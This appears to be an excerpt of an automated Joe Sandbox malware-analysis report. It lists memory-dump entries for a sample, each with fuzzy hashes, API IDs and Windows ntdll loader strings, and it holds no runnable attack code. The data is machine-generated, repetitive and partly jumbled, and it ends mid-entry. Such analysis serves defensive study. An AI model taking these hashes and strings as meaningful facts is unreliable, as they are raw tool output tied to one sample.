                                                    • Instruction Fuzzy Hash: 6F61BE74604301DFDB6DCF68C480B6ABBE2FF89704F158559F8698B296D770E881CB91
                                                    Strings
                                                    • Failed to reallocate the system dirs string !, xrefs: 011B82D7
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 011B82DE
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011B82E8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    • Opcode ID: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
                                                    • Instruction ID: 6c86270ae5ee9d3f86b4c527d954710f4a0e77c5d4d58d8ad292368f539f0ffd
                                                    • Opcode Fuzzy Hash: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
                                                    • Instruction Fuzzy Hash: 7F411372554702EBD729EB68E845B9BBBECEF45B54F00492AF948D3250EB74D800CBD2
                                                    Strings
                                                    • @, xrefs: 011FC1F1
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011FC1C5
                                                    • PreferredUILanguages, xrefs: 011FC212
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
                                                    • Instruction ID: 1b5f7670c602cd51c03118da4efbf69a393beeecf37a323bf6611c07a0b27842
                                                    • Opcode Fuzzy Hash: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
                                                    • Instruction Fuzzy Hash: CC418275E0020DEBDF19DAD8C841FEEBBB9EB14704F04406EEA19B7240D7749A44DB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
                                                    • Instruction ID: 39642bdc511ba74952db17cdd63eb146c0cb36bf1c94abc2f11b4139368fc543
                                                    • Opcode Fuzzy Hash: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
                                                    • Instruction Fuzzy Hash: F2414232A00259CBEB2EDBE8D840BADBBB8FF65384F15045AD911EBF81D7349901CB11
                                                    Strings
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011C4888
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 011C4899
                                                    • LdrpCheckRedirection, xrefs: 011C488F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                                    • Instruction ID: a7e9643994b699b211b00d367b4f4a4e838b3e0acebd5f5047f3816bccf18cd0
                                                    • Opcode Fuzzy Hash: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                                    • Instruction Fuzzy Hash: 5C41D432A187519FCB29CF9CD860A27BBE4EF69E50B06056DED88D7B55D730D800CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
                                                    • Instruction ID: e360334c51eedad71632eccae24a0154cdb627cd8a4b96f352c62915159d3817
                                                    • Opcode Fuzzy Hash: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
                                                    • Instruction Fuzzy Hash: 58113335318102DFDBADCA18C485B7ABBA6EF84719F1A812DF816CB256FB30D840C756
                                                    Strings
                                                    • Process initialization failed with status 0x%08lx, xrefs: 011C20F3
                                                    • LdrpInitializationFailure, xrefs: 011C20FA
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011C2104
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
                                                    • Instruction ID: 3c75daf45dacef739d0c8241d7179115152aea7824a12b9b78a82ef9f3d4236f
                                                    • Opcode Fuzzy Hash: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
                                                    • Instruction Fuzzy Hash: C5F0C235640319BBE72CEA4DEC46F993BA8EB91F58F50006DF60077685E7F0AA10CA91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
                                                    • Instruction ID: b65694c337e1020fb1abddb8a4a86f7de66f72dafbc82d03a73564ba8b1410b5
                                                    • Opcode Fuzzy Hash: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
                                                    • Instruction Fuzzy Hash: F2716871A0014ADFDB09DFA8C980BAEBBF8FF18744F154065E915A7251EB74EE01CBA1
                                                    Strings
                                                    • LdrResSearchResource Exit, xrefs: 0114AA25
                                                    • LdrResSearchResource Enter, xrefs: 0114AA13
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    • Opcode ID: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
                                                    • Instruction ID: a2b7e1f9c075e317a956f4714a7b8a6890b0f95e9e808bb7d2be95d327b7eedc
                                                    • Opcode Fuzzy Hash: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
                                                    • Instruction Fuzzy Hash: AEE19275E802199FEB2ECF98D980BAEBBB9FF44714F12442AE912E7241D734D940CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: 8153e0d8ccbb18374daa44082ce70e6e703f8587164450e409832b8e842f8dc4
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: 2CC1AF312243429BEB26CF28C841B6BBBE5AFD4318F444B2CF6968B2D2D775D545CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
                                                    • Instruction ID: a04e6c79fa9642a78be1bc00ef6fb41e208c568cb2ae0db8015a8524967dbc60
                                                    • Opcode Fuzzy Hash: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
                                                    • Instruction Fuzzy Hash: AE616C72E017199FDB19DFA8C880BEEBBB5FB48704F14816DE659EB251E731A900CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    • Opcode ID: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
                                                    • Instruction ID: 886b341f51b85c4e9acc004d3401a172fcb57185c4733281f7f1c856b5b66442
                                                    • Opcode Fuzzy Hash: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
                                                    • Instruction Fuzzy Hash: 64511771E0061EAFDB15DFE9CC84AEEBBF8AF44758F104529E611E7690D7309A05CB60
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0114063D
                                                    • kLsE, xrefs: 01140540
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
                                                    • Instruction ID: 96a328b92cc69fc84b28c29e61d0262897ae6f7f43575d1bc2a6d5b55f0bb63a
                                                    • Opcode Fuzzy Hash: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
                                                    • Instruction Fuzzy Hash: 6951BF715047429BD728DF6AC4406E7B7E8AF88B04F10483EE6EA87241E770D545CF92
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0114A2FB
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0114A309
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
                                                    • Instruction ID: fe1f20fbdea1b6b75f49521ae85809c642b38f98055dce5152bf45d7fb8127ba
                                                    • Opcode Fuzzy Hash: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
                                                    • Instruction Fuzzy Hash: D5411235A48245CFDB2DCF69D840B6EBBB4FF85B04F1640A9E912DB291E3B5D900CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    • Opcode ID: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
                                                    • Instruction ID: 34f019aa1f939aa9d47f53e321486063081712640a95c1538678e8555e6287df
                                                    • Opcode Fuzzy Hash: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
                                                    • Instruction Fuzzy Hash: 3901F4B2240704AFD316DF14DD49F1A77F9EB85719F058939B648C7694E334D904CB46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
                                                    • Instruction ID: 5436cd21b720be1c8405fe21bc9845280ed6e4ef9b34b16a819e4b48c5a0daf1
                                                    • Opcode Fuzzy Hash: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
                                                    • Instruction Fuzzy Hash: F1827B75E012198FEF29CFA9D880BEDBBB1BF48B50F14816AD919AB350D7309941CF91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
                                                    • Instruction ID: f9978d007d2b5c0eb0f0b2e234a47672d9f88a8f5baa15d15374716e6f6bb13b
                                                    • Opcode Fuzzy Hash: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
                                                    • Instruction Fuzzy Hash: C9918372900219AFEB29DF95CC85FAEBBB8EF24B54F104019F601AB291D775ED00CB60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: d349a47b6618f0412a4d38469f93c30b50031ea23b4319a7b46eb5979ecee4e6
                                                    • Instruction ID: e5fa7f23eba8f10e0e99789d2344ac01456f9244d0cb0ba8d9bb6b95c2354b2e
                                                    • Opcode Fuzzy Hash: d349a47b6618f0412a4d38469f93c30b50031ea23b4319a7b46eb5979ecee4e6
                                                    • Instruction Fuzzy Hash: E991AF31902A0AAFDB2AAFE5DC48FEFBBB9EF45744F140029F511A7250EB749901CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • String ID: .mui
                                                    • String ID: EXT-
                                                    • String ID: BinaryHash
                                                    • String ID: #
                                                    • String ID: BinaryName
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011C895E
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4997de58e8250e5dd5c2713f1ce8805c2287d288fd0a9a42d4b5de1d52c9af56
                                                    • Instruction ID: fbef6a7cca65676fee7bd833518c5855bc3fee457fe0aa71cf2102383adda2a2
                                                    • Opcode Fuzzy Hash: 4997de58e8250e5dd5c2713f1ce8805c2287d288fd0a9a42d4b5de1d52c9af56
                                                    • Instruction Fuzzy Hash: 9C814C71A05609AFDB29DFA9C880AEEBBFAFF48354F104429E556A7350D730AC45CB60
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2395c5b2f1631c7f4a5985756fec052120e0b28c244261869b1d9b5bfa05db8
                                                    • Instruction ID: 6dec605bb1e1110ed1f596ee8153fe9ee53850684b921e1b00be6bfb3e9ea671
                                                    • Opcode Fuzzy Hash: b2395c5b2f1631c7f4a5985756fec052120e0b28c244261869b1d9b5bfa05db8
                                                    • Instruction Fuzzy Hash: 1C71ABB9D00669DBCB298F59D8907FEBBB9FF58710F15411AE952AB350E3349900CBE0
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 239a272efcfb95dda27bfb679c0b38e8feda0272dc31bd1c30773a275fc1cc46
                                                    • Instruction ID: dfcd064b4bc8ed901e96f5a28817396db72ca968d97a0f981676a1575dcd3b80
                                                    • Opcode Fuzzy Hash: 239a272efcfb95dda27bfb679c0b38e8feda0272dc31bd1c30773a275fc1cc46
                                                    • Instruction Fuzzy Hash: A871B5B0A00209EFDB28DF99E948A9BBBF9FFC5304F00815EE715A7658D7318A44CB54
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b402f77e7ebc68b8c477baae81dbdb6962671851c6cc3308961af7e1903732c
                                                    • Instruction ID: 7fec4d0835fbad612780309e0089ac46f044dfde02c0222518cc10f17ad7e25d
                                                    • Opcode Fuzzy Hash: 5b402f77e7ebc68b8c477baae81dbdb6962671851c6cc3308961af7e1903732c
                                                    • Instruction Fuzzy Hash: 5071D236604642CFD359DF28C480B2AB7E5FF94314F0585AAEC698B351DB74D846CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                    • Instruction ID: 770158d95cdd3d0cbf864c6f87c61e7bdd309f582ece3ac124ae97f37ba22948
                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                    • Instruction Fuzzy Hash: 56719E71A00609EFCB15DFA9C984EEEBBB8FF58744F104569E915A7250DB34EA01CB50
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bf9e25f0fbf5d08d0227805d2ffdf3ca27ea4b8cc66fcbf8c3913361bf0d835
                                                    • Instruction ID: 92d946348445bb59ab81de5869c5da9184f2abd4bb3b7453232c8e2ae34067cb
                                                    • Opcode Fuzzy Hash: 6bf9e25f0fbf5d08d0227805d2ffdf3ca27ea4b8cc66fcbf8c3913361bf0d835
                                                    • Instruction Fuzzy Hash: 0371E232200B01EFE73ADF58C844F5ABBE6FF40764F158528E65A8B2A0DB75E944CB50
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd073111c42fd971fc49ff4698857dc79b1ca3cbc13715616e2bc1b850b84908
                                                    • Instruction ID: 8cc4861df8d700339cedd01506de64795c744bdde76fbdd1185fd9bc71367788
                                                    • Opcode Fuzzy Hash: fd073111c42fd971fc49ff4698857dc79b1ca3cbc13715616e2bc1b850b84908
                                                    • Instruction Fuzzy Hash: 95711C71E5020ABFDB16DF94C881FEEBBF9FB14354F104119E620A7294E774AA05CB90
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e55889319b804166a5689d0833662ca328560b06e01e92c6482470753f7fd89a
                                                    • Instruction ID: 9cc2a45458aa47d6aaf3d649f06ed21d083575d2bc6c8f584d229027396ae057
                                                    • Opcode Fuzzy Hash: e55889319b804166a5689d0833662ca328560b06e01e92c6482470753f7fd89a
                                                    • Instruction Fuzzy Hash: AB51CD72504712AFD31ADE68D884B5BBBE8EFC4714F05492DBB48DB110E734ED058BA2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b95d36fe35e38b3f83f5f2162dd1b56f396b3dc235779ad472ce900eb54311c
                                                    • Instruction ID: 58a7925d473f9d2cfa2653d0aa16631c90eb901e1abbc0189dc138f06499ebc5
                                                    • Opcode Fuzzy Hash: 5b95d36fe35e38b3f83f5f2162dd1b56f396b3dc235779ad472ce900eb54311c
                                                    • Instruction Fuzzy Hash: 2251BE70900B059FD729DF9AC888BABFBF8FF54714F10461ED252576A1D770A541CB90
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0233d700eee2567e000823e9807e18c363d347180aea662f9d2cc144b2b42757
                                                    • Instruction ID: 6ff9e3f97eaf8db45aeb9f8f9936de85941d361c0be7e3c4071bf9906e381bd2
                                                    • Opcode Fuzzy Hash: 0233d700eee2567e000823e9807e18c363d347180aea662f9d2cc144b2b42757
                                                    • Instruction Fuzzy Hash: 55518F71211A09DFCB2AEF69C9C0EAAB3F9FF14798F41046AE652C7260D734E941CB51
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f5e188ffa696d75ad78825f90177dda7f752b6a73451a79b385fc0bf8946e13
                                                    • Instruction ID: cfe890529c3ceb316f15e453ca831caaeb568dd402b2ce5c1f1cf182d002f979
                                                    • Opcode Fuzzy Hash: 7f5e188ffa696d75ad78825f90177dda7f752b6a73451a79b385fc0bf8946e13
                                                    • Instruction Fuzzy Hash: 7A5199716087128FD758DFA9C884A6BBBE5FFC8208F444A2EF599C7650EB30D905CB52
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction ID: 45db7c1a6e2175a7ea0ada40ee12a62c66f2c60463b9e3656da1d137bb1ca8f7
                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction Fuzzy Hash: 3051DE35E0061AABDF19DF98C440BFEBBB9AF45344F04806AEA04EB640D739DD54CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction ID: 30e1a794f01e672753ddb4e558589f2224704216e83b99add694e8d9bfb74d6d
                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction Fuzzy Hash: 0351A77190221AAFDF299E94C884BBEBF75AF10B18F15465DD91267190D730DD40CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 297803a15b0485bed9f86db17ba779c45642846b9ddf294ff4c81044432f7855
                                                    • Instruction ID: c74edb559917f4e03207498af08d372f1058897e4e80206a40b872f6ea6a0ff4
                                                    • Opcode Fuzzy Hash: 297803a15b0485bed9f86db17ba779c45642846b9ddf294ff4c81044432f7855
                                                    • Instruction Fuzzy Hash: 1F41B971B21A129BD72BDB2DC854B7BBBAAEF90620F044319EA55C72C3DB70D841C791
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e9c493b735b95e38ed59bdaab43e1a3a7af95bc7cb09cb3566086a5a2d4c88a
